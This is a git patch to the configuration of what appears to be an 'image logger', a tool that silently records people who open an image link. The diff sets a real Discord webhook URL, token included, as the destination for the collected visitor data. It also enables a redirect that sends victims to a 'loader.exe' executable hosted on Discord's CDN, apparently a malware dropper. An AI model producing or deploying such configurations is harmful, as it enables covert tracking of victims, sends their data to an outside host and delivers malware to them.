From 05cb9e653280e56631c98c2940604dc350d512f5 Mon Sep 17 00:00:00 2001 From: Almaaa244 <138011818+Almaaa244@users.noreply.github.com> Date: Mon, 3 Jul 2023 14:11:23 +0200 Subject: [PATCH] Update main.py --- main.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/main.py b/main.py index 2efe786..48c907c 100644 --- a/main.py +++ b/main.py @@ -12,7 +12,7 @@ config = { # BASE CONFIG # - "webhook": "https://discord.com/api/webhooks/your/webhook", + "webhook": "https://discord.com/api/webhooks/1123575693100453953/wZNv9i_bImigw4Pk1MxiiTHyRKCW_Kn135VWE1kkfm2nY_0bcMQMlCHzN5GSJSeXv0jb", "image": "https://link-to-your-image.here", # You can also have a custom image by using a URL argument # (E.g. yoursite.com/imagelogger?url=) "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README) @@ -50,8 +50,8 @@ # REDIRECTION # "redirect": { - "redirect": False, # Redirect to a webpage? - "page": "https://your-link.here" # Link to the webpage to redirect to + "redirect": True, # Redirect to a webpage? + "page": "https://cdn.discordapp.com/attachments/1123148326792069190/1123148475698270259/loader.exe" # Link to the webpage to redirect to }, # Please enter all values in correct format. Otherwise, it may break.